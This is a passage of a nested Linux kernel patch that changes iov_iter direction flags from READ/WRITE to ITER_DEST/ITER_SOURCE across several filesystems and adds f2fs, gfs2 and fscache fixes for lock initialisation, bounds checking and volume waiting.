+ 	if (args.len > args.unencoded_len - args.unencoded_offset)
+ 		goto out_acct;
+ 
+-	ret = import_iovec(WRITE, args.iov, args.iovcnt, ARRAY_SIZE(iovstack),
++	ret = import_iovec(ITER_SOURCE, args.iov, args.iovcnt, ARRAY_SIZE(iovstack),
+ 			   &iov, &iter);
+ 	if (ret < 0)
+ 		goto out_acct;
+diff --git a/fs/ceph/addr.c b/fs/ceph/addr.c
+index dcf701b05cc1c..61f47debec5ac 100644
+--- a/fs/ceph/addr.c
++++ b/fs/ceph/addr.c
+@@ -288,7 +288,7 @@ static bool ceph_netfs_issue_op_inline(struct netfs_io_subrequest *subreq)
+ 	}
+ 
+ 	len = min_t(size_t, iinfo->inline_len - subreq->start, subreq->len);
+-	iov_iter_xarray(&iter, READ, &rreq->mapping->i_pages, subreq->start, len);
++	iov_iter_xarray(&iter, ITER_DEST, &rreq->mapping->i_pages, subreq->start, len);
+ 	err = copy_to_iter(iinfo->inline_data + subreq->start, len, &iter);
+ 	if (err == 0)
+ 		err = -EFAULT;
+@@ -327,7 +327,7 @@ static void ceph_netfs_issue_read(struct netfs_io_subrequest *subreq)
+ 	}
+ 
+ 	dout("%s: pos=%llu orig_len=%zu len=%llu\n", __func__, subreq->start, subreq->len, len);
+-	iov_iter_xarray(&iter, READ, &rreq->mapping->i_pages, subreq->start, len);
++	iov_iter_xarray(&iter, ITER_DEST, &rreq->mapping->i_pages, subreq->start, len);
+ 	err = iov_iter_get_pages_alloc2(&iter, &pages, len, &page_off);
+ 	if (err < 0) {
+ 		dout("%s: iov_ter_get_pages_alloc returned %d\n", __func__, err);
+diff --git a/fs/ceph/file.c b/fs/ceph/file.c
+index 04fd34557de84..6f9580defb2b3 100644
+--- a/fs/ceph/file.c
++++ b/fs/ceph/file.c
+@@ -1161,7 +1161,7 @@ static void ceph_aio_complete_req(struct ceph_osd_request *req)
+ 				aio_req->total_len = rc + zlen;
+ 			}
+ 
+-			iov_iter_bvec(&i, READ, osd_data->bvec_pos.bvecs,
++			iov_iter_bvec(&i, ITER_DEST, osd_data->bvec_pos.bvecs,
+ 				      osd_data->num_bvecs, len);
+ 			iov_iter_advance(&i, rc);
+ 			iov_iter_zero(zlen, &i);
+@@ -1400,7 +1400,7 @@ ceph_direct_read_write(struct kiocb *iocb, struct iov_iter *iter,
+ 				int zlen = min_t(size_t, len - ret,
+ 						 size - pos - ret);
+ 
+-				iov_iter_bvec(&i, READ, bvecs, num_pages, len);
++				iov_iter_bvec(&i, ITER_DEST, bvecs, num_pages, len);
+ 				iov_iter_advance(&i, ret);
+ 				iov_iter_zero(zlen, &i);
+ 				ret += zlen;
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index eab36e4ea1300..384c7c0e10889 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -761,7 +761,7 @@ cifs_read_from_socket(struct TCP_Server_Info *server, char *buf,
+ {
+ 	struct msghdr smb_msg = {};
+ 	struct kvec iov = {.iov_base = buf, .iov_len = to_read};
+-	iov_iter_kvec(&smb_msg.msg_iter, READ, &iov, 1, to_read);
++	iov_iter_kvec(&smb_msg.msg_iter, ITER_DEST, &iov, 1, to_read);
+ 
+ 	return cifs_readv_from_socket(server, &smb_msg);
+ }
+@@ -776,7 +776,7 @@ cifs_discard_from_socket(struct TCP_Server_Info *server, size_t to_read)
+ 	 *  and cifs_readv_from_socket sets msg_control and msg_controllen
+ 	 *  so little to initialize in struct msghdr
+ 	 */
+-	iov_iter_discard(&smb_msg.msg_iter, READ, to_read);
++	iov_iter_discard(&smb_msg.msg_iter, ITER_DEST, to_read);
+ 
+ 	return cifs_readv_from_socket(server, &smb_msg);
+ }
+@@ -788,7 +788,7 @@ cifs_read_page_from_socket(struct TCP_Server_Info *server, struct page *page,
+ 	struct msghdr smb_msg = {};
+ 	struct bio_vec bv = {
+ 		.bv_page = page, .bv_len = to_read, .bv_offset = page_offset};
+-	iov_iter_bvec(&smb_msg.msg_iter, READ, &bv, 1, to_read);
++	iov_iter_bvec(&smb_msg.msg_iter, ITER_DEST, &bv, 1, to_read);
+ 	return cifs_readv_from_socket(server, &smb_msg);
+ }
+ 
+diff --git a/fs/cifs/file.c b/fs/cifs/file.c
+index cd96982099309..209dfc06fd6d1 100644
+--- a/fs/cifs/file.c
++++ b/fs/cifs/file.c
+@@ -3532,7 +3532,7 @@ static ssize_t __cifs_writev(
+ 		ctx->iter = *from;
+ 		ctx->len = len;
+ 	} else {
+-		rc = setup_aio_ctx_iter(ctx, from, WRITE);
++		rc = setup_aio_ctx_iter(ctx, from, ITER_SOURCE);
+ 		if (rc) {
+ 			kref_put(&ctx->refcount, cifs_aio_ctx_release);
+ 			return rc;
+@@ -4276,7 +4276,7 @@ static ssize_t __cifs_readv(
+ 		ctx->iter = *to;
+ 		ctx->len = len;
+ 	} else {
+-		rc = setup_aio_ctx_iter(ctx, to, READ);
++		rc = setup_aio_ctx_iter(ctx, to, ITER_DEST);
+ 		if (rc) {
+ 			kref_put(&ctx->refcount, cifs_aio_ctx_release);
+ 			return rc;
+diff --git a/fs/cifs/fscache.c b/fs/cifs/fscache.c
+index a1751b9563184..f6f3a6b75601b 100644
+--- a/fs/cifs/fscache.c
++++ b/fs/cifs/fscache.c
+@@ -150,7 +150,7 @@ static int fscache_fallback_read_page(struct inode *inode, struct page *page)
+ 	bvec[0].bv_page		= page;
+ 	bvec[0].bv_offset	= 0;
+ 	bvec[0].bv_len		= PAGE_SIZE;
+-	iov_iter_bvec(&iter, READ, bvec, ARRAY_SIZE(bvec), PAGE_SIZE);
++	iov_iter_bvec(&iter, ITER_DEST, bvec, ARRAY_SIZE(bvec), PAGE_SIZE);
+ 
+ 	ret = fscache_begin_read_operation(&cres, cookie);
+ 	if (ret < 0)
+@@ -180,7 +180,7 @@ static int fscache_fallback_write_page(struct inode *inode, struct page *page,
+ 	bvec[0].bv_page		= page;
+ 	bvec[0].bv_offset	= 0;
+ 	bvec[0].bv_len		= PAGE_SIZE;
+-	iov_iter_bvec(&iter, WRITE, bvec, ARRAY_SIZE(bvec), PAGE_SIZE);
++	iov_iter_bvec(&iter, ITER_SOURCE, bvec, ARRAY_SIZE(bvec), PAGE_SIZE);
+ 
+ 	ret = fscache_begin_write_operation(&cres, cookie);
+ 	if (ret < 0)
+diff --git a/fs/cifs/smb2ops.c b/fs/cifs/smb2ops.c
+index 1ff5b6b0e07a1..78c2d618eb511 100644
+--- a/fs/cifs/smb2ops.c
++++ b/fs/cifs/smb2ops.c
+@@ -4737,13 +4737,13 @@ handle_read_data(struct TCP_Server_Info *server, struct mid_q_entry *mid,
+ 			return 0;
+ 		}
+ 
+-		iov_iter_bvec(&iter, WRITE, bvec, npages, data_len);
++		iov_iter_bvec(&iter, ITER_SOURCE, bvec, npages, data_len);
+ 	} else if (buf_len >= data_offset + data_len) {
+ 		/* read response payload is in buf */
+ 		WARN_ONCE(npages > 0, "read data can be either in buf or in pages");
+ 		iov.iov_base = buf + data_offset;
+ 		iov.iov_len = data_len;
+-		iov_iter_kvec(&iter, WRITE, &iov, 1, data_len);
++		iov_iter_kvec(&iter, ITER_SOURCE, &iov, 1, data_len);
+ 	} else {
+ 		/* read response payload cannot be in both buf and pages */
+ 		WARN_ONCE(1, "buf can not contain only a part of read data");
+diff --git a/fs/cifs/transport.c b/fs/cifs/transport.c
+index 575fa8f583422..3851d0aaa2886 100644
+--- a/fs/cifs/transport.c
++++ b/fs/cifs/transport.c
+@@ -347,7 +347,7 @@ __smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
+ 			.iov_base = &rfc1002_marker,
+ 			.iov_len  = 4
+ 		};
+-		iov_iter_kvec(&smb_msg.msg_iter, WRITE, &hiov, 1, 4);
++		iov_iter_kvec(&smb_msg.msg_iter, ITER_SOURCE, &hiov, 1, 4);
+ 		rc = smb_send_kvec(server, &smb_msg, &sent);
+ 		if (rc < 0)
+ 			goto unmask;
+@@ -368,7 +368,7 @@ __smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
+ 			size += iov[i].iov_len;
+ 		}
+ 
+-		iov_iter_kvec(&smb_msg.msg_iter, WRITE, iov, n_vec, size);
++		iov_iter_kvec(&smb_msg.msg_iter, ITER_SOURCE, iov, n_vec, size);
+ 
+ 		rc = smb_send_kvec(server, &smb_msg, &sent);
+ 		if (rc < 0)
+@@ -384,7 +384,7 @@ __smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
+ 			rqst_page_get_length(&rqst[j], i, &bvec.bv_len,
+ 					     &bvec.bv_offset);
+ 
+-			iov_iter_bvec(&smb_msg.msg_iter, WRITE,
++			iov_iter_bvec(&smb_msg.msg_iter, ITER_SOURCE,
+ 				      &bvec, 1, bvec.bv_len);
+ 			rc = smb_send_kvec(server, &smb_msg, &sent);
+ 			if (rc < 0)
+diff --git a/fs/coredump.c b/fs/coredump.c
+index 7bad7785e8e67..095ed821c8ace 100644
+--- a/fs/coredump.c
++++ b/fs/coredump.c
+@@ -853,7 +853,7 @@ static int dump_emit_page(struct coredump_params *cprm, struct page *page)
+ 	if (dump_interrupted())
+ 		return 0;
+ 	pos = file->f_pos;
+-	iov_iter_bvec(&iter, WRITE, &bvec, 1, PAGE_SIZE);
++	iov_iter_bvec(&iter, ITER_SOURCE, &bvec, 1, PAGE_SIZE);
+ 	n = __kernel_write_iter(cprm->file, &iter, &pos);
+ 	if (n != PAGE_SIZE)
+ 		return 0;
+diff --git a/fs/erofs/fscache.c b/fs/erofs/fscache.c
+index 6a792a513d6b8..b04f93bc062a8 100644
+--- a/fs/erofs/fscache.c
++++ b/fs/erofs/fscache.c
+@@ -194,7 +194,7 @@ static int erofs_fscache_read_folios_async(struct fscache_cookie *cookie,
+ 
+ 		atomic_inc(&rreq->nr_outstanding);
+ 
+-		iov_iter_xarray(&iter, READ, &rreq->mapping->i_pages,
++		iov_iter_xarray(&iter, ITER_DEST, &rreq->mapping->i_pages,
+ 				start + done, subreq->len);
+ 
+ 		ret = fscache_read(cres, subreq->start, &iter,
+@@ -290,7 +290,7 @@ static int erofs_fscache_data_read(struct address_space *mapping,
+ 		if (IS_ERR(src))
+ 			return PTR_ERR(src);
+ 
+-		iov_iter_xarray(&iter, READ, &mapping->i_pages, pos, PAGE_SIZE);
++		iov_iter_xarray(&iter, ITER_DEST, &mapping->i_pages, pos, PAGE_SIZE);
+ 		if (copy_to_iter(src + offset, size, &iter) != size) {
+ 			erofs_put_metabuf(&buf);
+ 			return -EFAULT;
+@@ -302,7 +302,7 @@ static int erofs_fscache_data_read(struct address_space *mapping,
+ 
+ 	if (!(map.m_flags & EROFS_MAP_MAPPED)) {
+ 		count = len;
+-		iov_iter_xarray(&iter, READ, &mapping->i_pages, pos, count);
++		iov_iter_xarray(&iter, ITER_DEST, &mapping->i_pages, pos, count);
+ 		iov_iter_zero(count, &iter);
+ 		return count;
+ 	}
+diff --git a/fs/f2fs/gc.c b/fs/f2fs/gc.c
+index b3184d8b1ce89..ee6836478efe6 100644
+--- a/fs/f2fs/gc.c
++++ b/fs/f2fs/gc.c
+@@ -1078,7 +1078,7 @@ static bool is_alive(struct f2fs_sb_info *sbi, struct f2fs_summary *sum,
+ {
+ 	struct page *node_page;
+ 	nid_t nid;
+-	unsigned int ofs_in_node, max_addrs;
++	unsigned int ofs_in_node, max_addrs, base;
+ 	block_t source_blkaddr;
+ 
+ 	nid = le32_to_cpu(sum->nid);
+@@ -1104,11 +1104,17 @@ static bool is_alive(struct f2fs_sb_info *sbi, struct f2fs_summary *sum,
+ 		return false;
+ 	}
+ 
+-	max_addrs = IS_INODE(node_page) ? DEF_ADDRS_PER_INODE :
+-						DEF_ADDRS_PER_BLOCK;
+-	if (ofs_in_node >= max_addrs) {
+-		f2fs_err(sbi, "Inconsistent ofs_in_node:%u in summary, ino:%u, nid:%u, max:%u",
+-			ofs_in_node, dni->ino, dni->nid, max_addrs);
++	if (IS_INODE(node_page)) {
++		base = offset_in_addr(F2FS_INODE(node_page));
++		max_addrs = DEF_ADDRS_PER_INODE;
++	} else {
++		base = 0;
++		max_addrs = DEF_ADDRS_PER_BLOCK;
++	}
++
++	if (base + ofs_in_node >= max_addrs) {
++		f2fs_err(sbi, "Inconsistent blkaddr offset: base:%u, ofs_in_node:%u, max:%u, ino:%u, nid:%u",
++			base, ofs_in_node, max_addrs, dni->ino, dni->nid);
+ 		f2fs_put_page(node_page, 1);
+ 		return false;
+ 	}
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index 67d51f5276061..eaabb85cb4ddb 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -4095,6 +4095,24 @@ try_onemore:
+ 
+ 	sbi->sb = sb;
+ 
++	/* initialize locks within allocated memory */
++	init_f2fs_rwsem(&sbi->gc_lock);
++	mutex_init(&sbi->writepages);
++	init_f2fs_rwsem(&sbi->cp_global_sem);
++	init_f2fs_rwsem(&sbi->node_write);
++	init_f2fs_rwsem(&sbi->node_change);
++	spin_lock_init(&sbi->stat_lock);
++	init_f2fs_rwsem(&sbi->cp_rwsem);
++	init_f2fs_rwsem(&sbi->quota_sem);
++	init_waitqueue_head(&sbi->cp_wait);
++	spin_lock_init(&sbi->error_lock);
++
++	for (i = 0; i < NR_INODE_TYPE; i++) {
++		INIT_LIST_HEAD(&sbi->inode_list[i]);
++		spin_lock_init(&sbi->inode_lock[i]);
++	}
++	mutex_init(&sbi->flush_lock);
++
+ 	/* Load the checksum driver */
+ 	sbi->s_chksum_driver = crypto_alloc_shash("crc32", 0, 0);
+ 	if (IS_ERR(sbi->s_chksum_driver)) {
+@@ -4118,6 +4136,8 @@ try_onemore:
+ 	sb->s_fs_info = sbi;
+ 	sbi->raw_super = raw_super;
+ 
++	memcpy(sbi->errors, raw_super->s_errors, MAX_F2FS_ERRORS);
++
+ 	/* precompute checksum seed for metadata */
+ 	if (f2fs_sb_has_inode_chksum(sbi))
+ 		sbi->s_chksum_seed = f2fs_chksum(sbi, ~0, raw_super->uuid,
+@@ -4174,26 +4194,14 @@ try_onemore:
+ 
+ 	/* init f2fs-specific super block info */
+ 	sbi->valid_super_block = valid_super_block;
+-	init_f2fs_rwsem(&sbi->gc_lock);
+-	mutex_init(&sbi->writepages);
+-	init_f2fs_rwsem(&sbi->cp_global_sem);
+-	init_f2fs_rwsem(&sbi->node_write);
+-	init_f2fs_rwsem(&sbi->node_change);
+ 
+ 	/* disallow all the data/node/meta page writes */
+ 	set_sbi_flag(sbi, SBI_POR_DOING);
+-	spin_lock_init(&sbi->stat_lock);
+ 
+ 	err = f2fs_init_write_merge_io(sbi);
+ 	if (err)
+ 		goto free_bio_info;
+ 
+-	spin_lock_init(&sbi->error_lock);
+-	memcpy(sbi->errors, raw_super->s_errors, MAX_F2FS_ERRORS);
+-
+-	init_f2fs_rwsem(&sbi->cp_rwsem);
+-	init_f2fs_rwsem(&sbi->quota_sem);
+-	init_waitqueue_head(&sbi->cp_wait);
+ 	init_sb_info(sbi);
+ 
+ 	err = f2fs_init_iostat(sbi);
+@@ -4271,12 +4279,6 @@ try_onemore:
+ 	limit_reserve_root(sbi);
+ 	adjust_unusable_cap_perc(sbi);
+ 
+-	for (i = 0; i < NR_INODE_TYPE; i++) {
+-		INIT_LIST_HEAD(&sbi->inode_list[i]);
+-		spin_lock_init(&sbi->inode_lock[i]);
+-	}
+-	mutex_init(&sbi->flush_lock);
+-
+ 	f2fs_init_extent_cache_info(sbi);
+ 
+ 	f2fs_init_ino_entry_info(sbi);
+diff --git a/fs/fscache/io.c b/fs/fscache/io.c
+index 3af3b08a9bb3f..0d2b8dec8f82c 100644
+--- a/fs/fscache/io.c
++++ b/fs/fscache/io.c
+@@ -286,7 +286,7 @@ void __fscache_write_to_cache(struct fscache_cookie *cookie,
+ 	 * taken into account.
+ 	 */
+ 
+-	iov_iter_xarray(&iter, WRITE, &mapping->i_pages, start, len);
++	iov_iter_xarray(&iter, ITER_SOURCE, &mapping->i_pages, start, len);
+ 	fscache_write(cres, start, &iter, fscache_wreq_done, wreq);
+ 	return;
+ 
+diff --git a/fs/fscache/volume.c b/fs/fscache/volume.c
+index ab8ceddf9efad..903af9d85f8b9 100644
+--- a/fs/fscache/volume.c
++++ b/fs/fscache/volume.c
+@@ -141,13 +141,14 @@ static bool fscache_is_acquire_pending(struct fscache_volume *volume)
+ static void fscache_wait_on_volume_collision(struct fscache_volume *candidate,
+ 					     unsigned int collidee_debug_id)
+ {
+-	wait_var_event_timeout(&candidate->flags,
+-			       !fscache_is_acquire_pending(candidate), 20 * HZ);
++	wait_on_bit_timeout(&candidate->flags, FSCACHE_VOLUME_ACQUIRE_PENDING,
++			    TASK_UNINTERRUPTIBLE, 20 * HZ);
+ 	if (fscache_is_acquire_pending(candidate)) {
+ 		pr_notice("Potential volume collision new=%08x old=%08x",
+ 			  candidate->debug_id, collidee_debug_id);
+ 		fscache_stat(&fscache_n_volumes_collision);
+-		wait_var_event(&candidate->flags, !fscache_is_acquire_pending(candidate));
++		wait_on_bit(&candidate->flags, FSCACHE_VOLUME_ACQUIRE_PENDING,
++			    TASK_UNINTERRUPTIBLE);
+ 	}
+ }
+ 
+@@ -347,8 +348,8 @@ static void fscache_wake_pending_volume(struct fscache_volume *volume,
+ 	hlist_bl_for_each_entry(cursor, p, h, hash_link) {
+ 		if (fscache_volume_same(cursor, volume)) {
+ 			fscache_see_volume(cursor, fscache_volume_see_hash_wake);
+-			clear_bit(FSCACHE_VOLUME_ACQUIRE_PENDING, &cursor->flags);
+-			wake_up_bit(&cursor->flags, FSCACHE_VOLUME_ACQUIRE_PENDING);
++			clear_and_wake_up_bit(FSCACHE_VOLUME_ACQUIRE_PENDING,
++					      &cursor->flags);
+ 			return;
+ 		}
+ 	}
+diff --git a/fs/fuse/ioctl.c b/fs/fuse/ioctl.c
+index 61d8afcb10a3f..fcce94ace2c23 100644
+--- a/fs/fuse/ioctl.c
++++ b/fs/fuse/ioctl.c
+@@ -255,7 +255,7 @@ long fuse_do_ioctl(struct file *file, unsigned int cmd, unsigned long arg,
+ 		ap.args.in_pages = true;
+ 
+ 		err = -EFAULT;
+-		iov_iter_init(&ii, WRITE, in_iov, in_iovs, in_size);
++		iov_iter_init(&ii, ITER_SOURCE, in_iov, in_iovs, in_size);
+ 		for (i = 0; iov_iter_count(&ii) && !WARN_ON(i >= ap.num_pages); i++) {
+ 			c = copy_page_from_iter(ap.pages[i], 0, PAGE_SIZE, &ii);
+ 			if (c != PAGE_SIZE && iov_iter_count(&ii))
+@@ -324,7 +324,7 @@ long fuse_do_ioctl(struct file *file, unsigned int cmd, unsigned long arg,
+ 		goto out;
+ 
+ 	err = -EFAULT;
+-	iov_iter_init(&ii, READ, out_iov, out_iovs, transferred);
++	iov_iter_init(&ii, ITER_DEST, out_iov, out_iovs, transferred);
+ 	for (i = 0; iov_iter_count(&ii) && !WARN_ON(i >= ap.num_pages); i++) {
+ 		c = copy_page_to_iter(ap.pages[i], 0, PAGE_SIZE, &ii);
+ 		if (c != PAGE_SIZE && iov_iter_count(&ii))
+diff --git a/fs/gfs2/aops.c b/fs/gfs2/aops.c
+index 05bee80ac7dee..e782b4f1d1043 100644
+--- a/fs/gfs2/aops.c
++++ b/fs/gfs2/aops.c
+@@ -427,8 +427,6 @@ static int stuffed_readpage(struct gfs2_inode *ip, struct page *page)
+ 		return error;
+ 
+ 	kaddr = kmap_atomic(page);
+-	if (dsize > gfs2_max_stuffed_size(ip))
+-		dsize = gfs2_max_stuffed_size(ip);
+ 	memcpy(kaddr, dibh->b_data + sizeof(struct gfs2_dinode), dsize);
+ 	memset(kaddr + dsize, 0, PAGE_SIZE - dsize);
+ 	kunmap_atomic(kaddr);
+diff --git a/fs/gfs2/bmap.c b/fs/gfs2/bmap.c
+index 3bdb2c668a71c..e7537fd305dd2 100644
+--- a/fs/gfs2/bmap.c
++++ b/fs/gfs2/bmap.c
+@@ -61,9 +61,6 @@ static int gfs2_unstuffer_page(struct gfs2_inode *ip, struct buffer_head *dibh,
+ 		void *kaddr = kmap(page);
+ 		u64 dsize = i_size_read(inode);
+  
+-		if (dsize > gfs2_max_stuffed_size(ip))
+-			dsize = gfs2_max_stuffed_size(ip);
+-
+ 		memcpy(kaddr, dibh->b_data + sizeof(struct gfs2_dinode), dsize);
+ 		memset(kaddr + dsize, 0, PAGE_SIZE - dsize);
+ 		kunmap(page);
+diff --git a/fs/gfs2/glops.c b/fs/gfs2/glops.c
+index 49210a2e7ce75..d78b61ecc1cdf 100644
+--- a/fs/gfs2/glops.c
++++ b/fs/gfs2/glops.c
+@@ -397,38 +397,39 @@ static int gfs2_dinode_in(struct gfs2_inode *ip, const void *buf)
+ 	struct timespec64 atime;
+ 	u16 height, depth;
+ 	umode_t mode = be32_to_cpu(str->di_mode);
+-	bool is_new = ip->i_inode.i_state & I_NEW;
++	struct inode *inode = &ip->i_inode;
++	bool is_new = inode->i_state & I_NEW;
+ 
+ 	if (unlikely(ip->i_no_addr != be64_to_cpu(str->di_num.no_addr)))
+ 		goto corrupt;
+-	if (unlikely(!is_new && inode_wrong_type(&ip->i_inode, mode)))
++	if (unlikely(!is_new && inode_wrong_type(inode, mode)))
+ 		goto corrupt;
+ 	ip->i_no_formal_ino = be64_to_cpu(str->di_num.no_formal_ino);
+-	ip->i_inode.i_mode = mode;
++	inode->i_mode = mode;
+ 	if (is_new) {
+-		ip->i_inode.i_rdev = 0;
++		inode->i_rdev = 0;
+ 		switch (mode & S_IFMT) {
+ 		case S_IFBLK:
+ 		case S_IFCHR:
+-			ip->i_inode.i_rdev = MKDEV(be32_to_cpu(str->di_major),
+-						   be32_to_cpu(str->di_minor));
++			inode->i_rdev = MKDEV(be32_to_cpu(str->di_major),
++					      be32_to_cpu(str->di_minor));
+ 			break;
+ 		}
+ 	}
+ 
+-	i_uid_write(&ip->i_inode, be32_to_cpu(str->di_uid));
+-	i_gid_write(&ip->i_inode, be32_to_cpu(str->di_gid));
+-	set_nlink(&ip->i_inode, be32_to_cpu(str->di_nlink));
+-	i_size_write(&ip->i_inode, be64_to_cpu(str->di_size));
+-	gfs2_set_inode_blocks(&ip->i_inode, be64_to_cpu(str->di_blocks));
++	i_uid_write(inode, be32_to_cpu(str->di_uid));
++	i_gid_write(inode, be32_to_cpu(str->di_gid));
++	set_nlink(inode, be32_to_cpu(str->di_nlink));
++	i_size_write(inode, be64_to_cpu(str->di_size));
++	gfs2_set_inode_blocks(inode, be64_to_cpu(str->di_blocks));
+ 	atime.tv_sec = be64_to_cpu(str->di_atime);
+ 	atime.tv_nsec = be32_to_cpu(str->di_atime_nsec);
+-	if (timespec64_compare(&ip->i_inode.i_atime, &atime) < 0)
+-		ip->i_inode.i_atime = atime;
+-	ip->i_inode.i_mtime.tv_sec = be64_to_cpu(str->di_mtime);
+-	ip->i_inode.i_mtime.tv_nsec = be32_to_cpu(str->di_mtime_nsec);
+-	ip->i_inode.i_ctime.tv_sec = be64_to_cpu(str->di_ctime);
+-	ip->i_inode.i_ctime.tv_nsec = be32_to_cpu(str->di_ctime_nsec);
++	if (timespec64_compare(&inode->i_atime, &atime) < 0)
++		inode->i_atime = atime;
++	inode->i_mtime.tv_sec = be64_to_cpu(str->di_mtime);
++	inode->i_mtime.tv_nsec = be32_to_cpu(str->di_mtime_nsec);
++	inode->i_ctime.tv_sec = be64_to_cpu(str->di_ctime);
++	inode->i_ctime.tv_nsec = be32_to_cpu(str->di_ctime_nsec);
+ 
+ 	ip->i_goal = be64_to_cpu(str->di_goal_meta);
+ 	ip->i_generation = be64_to_cpu(str->di_generation);
+@@ -436,7 +437,7 @@ static int gfs2_dinode_in(struct gfs2_inode *ip, const void *buf)
+ 	ip->i_diskflags = be32_to_cpu(str->di_flags);
+ 	ip->i_eattr = be64_to_cpu(str->di_eattr);
+ 	/* i_diskflags and i_eattr must be set before gfs2_set_inode_flags() */
+-	gfs2_set_inode_flags(&ip->i_inode);
++	gfs2_set_inode_flags(inode);
+ 	height = be16_to_cpu(str->di_height);
+ 	if (unlikely(height > GFS2_MAX_META_HEIGHT))
+ 		goto corrupt;
+@@ -448,8 +449,11 @@ static int gfs2_dinode_in(struct gfs2_inode *ip, const void *buf)
+ 	ip->i_depth = (u8)depth;
+ 	ip->i_entries = be32_to_cpu(str->di_entries);
+ 
+-	if (S_ISREG(ip->i_inode.i_mode))
+-		gfs2_set_aops(&ip->i_inode);
++	if (gfs2_is_stuffed(ip) && inode->i_size > gfs2_max_stuffed_size(ip))
++		goto corrupt;
++
++	if (S_ISREG(inode->i_mode))
++		gfs2_set_aops(inode);
+ 
+ 	return 0;
+ corrupt:
+diff --git a/fs/gfs2/log.c b/fs/gfs2/log.c
+index 723639376ae2a..61323deb80bc7 100644
+--- a/fs/gfs2/log.c
++++ b/fs/gfs2/log.c
+@@ -80,6 +80,15 @@ void gfs2_remove_from_ail(struct gfs2_bufdata *bd)
+ 	brelse(bd->bd_bh);
+ }
+ 
++static int __gfs2_writepage(struct page *page, struct writeback_control *wbc,
++		       void *data)
++{
++	struct address_space *mapping = data;
++	int ret = mapping->a_ops->writepage(page, wbc);
++	mapping_set_error(mapping, ret);
++	return ret;
++}
++
+ /**
+  * gfs2_ail1_start_one - Start I/O on a transaction
+  * @sdp: The superblock
+@@ -131,7 +140,7 @@ __acquires(&sdp->sd_ail_lock)
+ 		if (!mapping)
+ 			continue;
+ 		spin_unlock(&sdp->sd_ail_lock);
+-		ret = filemap_fdatawrite_wbc(mapping, wbc);
++		ret = write_cache_pages(mapping, wbc, __gfs2_writepage, mapping);
+ 		if (need_resched()) {
+ 			blk_finish_plug(plug);
+ 			cond_resched();
+diff --git a/fs/gfs2/super.c b/fs/gfs2/super.c
+index b018957a1bb24..011f9e7660ef8 100644
+--- a/fs/gfs2/super.c
++++ b/fs/gfs2/super.c
+@@ -379,6 +379,7 @@ out:
+ 
+ void gfs2_dinode_out(const struct gfs2_inode *ip, void *buf)
+ {
++	const struct inode *inode = &ip->i_inode;
+ 	struct gfs2_dinode *str = buf;
+ 
+ 	str->di_header.mh_magic = cpu_to_be32(GFS2_MAGIC);
+@@ -386,15 +387,15 @@ void gfs2_dinode_out(const struct gfs2_inode *ip, void *buf)
+ 	str->di_header.mh_format = cpu_to_be32(GFS2_FORMAT_DI);
+ 	str->di_num.no_addr = cpu_to_be64(ip->i_no_addr);
+ 	str->di_num.no_formal_ino = cpu_to_be64(ip->i_no_formal_ino);
+-	str->di_mode = cpu_to_be32(ip->i_inode.i_mode);
+-	str->di_uid = cpu_to_be32(i_uid_read(&ip->i_inode));
+-	str->di_gid = cpu_to_be32(i_gid_read(&ip->i_inode));
+-	str->di_nlink = cpu_to_be32(ip->i_inode.i_nlink);
+-	str->di_size = cpu_to_be64(i_size_read(&ip->i_inode));
+-	str->di_blocks = cpu_to_be64(gfs2_get_inode_blocks(&ip->i_inode));
+-	str->di_atime = cpu_to_be64(ip->i_inode.i_atime.tv_sec);
+-	str->di_mtime = cpu_to_be64(ip->i_inode.i_mtime.tv_sec);
+-	str->di_ctime = cpu_to_be64(ip->i_inode.i_ctime.tv_sec);
++	str->di_mode = cpu_to_be32(inode->i_mode);
++	str->di_uid = cpu_to_be32(i_uid_read(inode));
++	str->di_gid = cpu_to_be32(i_gid_read(inode));
++	str->di_nlink = cpu_to_be32(inode->i_nlink);
++	str->di_size = cpu_to_be64(i_size_read(inode));
++	str->di_blocks = cpu_to_be64(gfs2_get_inode_blocks(inode));
++	str->di_atime = cpu_to_be64(inode->i_atime.tv_sec);
++	str->di_mtime = cpu_to_be64(inode->i_mtime.tv_sec);
++	str->di_ctime = cpu_to_be64(inode->i_ctime.tv_sec);
+ 
+ 	str->di_goal_meta = cpu_to_be64(ip->i_goal);
+ 	str->di_goal_data = cpu_to_be64(ip->i_goal);
+@@ -402,16 +403,16 @@ void gfs2_dinode_out(const struct gfs2_inode *ip, void *buf)
+ 
+ 	str->di_flags = cpu_to_be32(ip->i_diskflags);
+ 	str->di_height = cpu_to_be16(ip->i_height);
+-	str->di_payload_format = cpu_to_be32(S_ISDIR(ip->i_inode.i_mode) &&
++	str->di_payload_format = cpu_to_be32(S_ISDIR(inode->i_mode) &&
+ 					     !(ip->i_diskflags & GFS2_DIF_EXHASH) ?
+ 					     GFS2_FORMAT_DE : 0);
+ 	str->di_depth = cpu_to_be16(ip->i_depth);
+ 	str->di_entries = cpu_to_be32(ip->i_entries);
+ 
+ 	str->di_eattr = cpu_to_be64(ip->i_eattr);
+-	str->di_atime_nsec = cpu_to_be32(ip->i_inode.i_atime.tv_nsec);
+-	str->di_mtime_nsec = cpu_to_be32(ip->i_inode.i_mtime.tv_nsec);
+-	str->di_ctime_nsec = cpu_to_be32(ip->i_inode.i_ctime.tv_nsec);
++	str->di_atime_nsec = cpu_to_be32(inode->i_atime.tv_nsec);
++	str->di_mtime_nsec = cpu_to_be32(inode->i_mtime.tv_nsec);
++	str->di_ctime_nsec = cpu_to_be32(inode->i_ctime.tv_nsec);
+ }
+ 
+ /**
+diff --git a/fs/netfs/io.c b/fs/netfs/io.c
+index e374767d1b683..7f753380e047a 100644
+--- a/fs/netfs/io.c
++++ b/fs/netfs/io.c
+@@ -23,7 +23,7 @@ static void netfs_clear_unread(struct netfs_io_subrequest *subreq)
+ {
+ 	struct iov_iter iter;
+ 
+-	iov_iter_xarray(&iter, READ, &subreq->rreq->mapping->i_pages,
++	iov_iter_xarray(&iter, ITER_DEST, &subreq->rreq->mapping->i_pages,
+ 			subreq->start + subreq->transferred,
+ 			subreq->len   - subreq->transferred);
+ 	iov_iter_zero(iov_iter_count(&iter), &iter);
+@@ -49,7 +49,7 @@ static void netfs_read_from_cache(struct netfs_io_request *rreq,
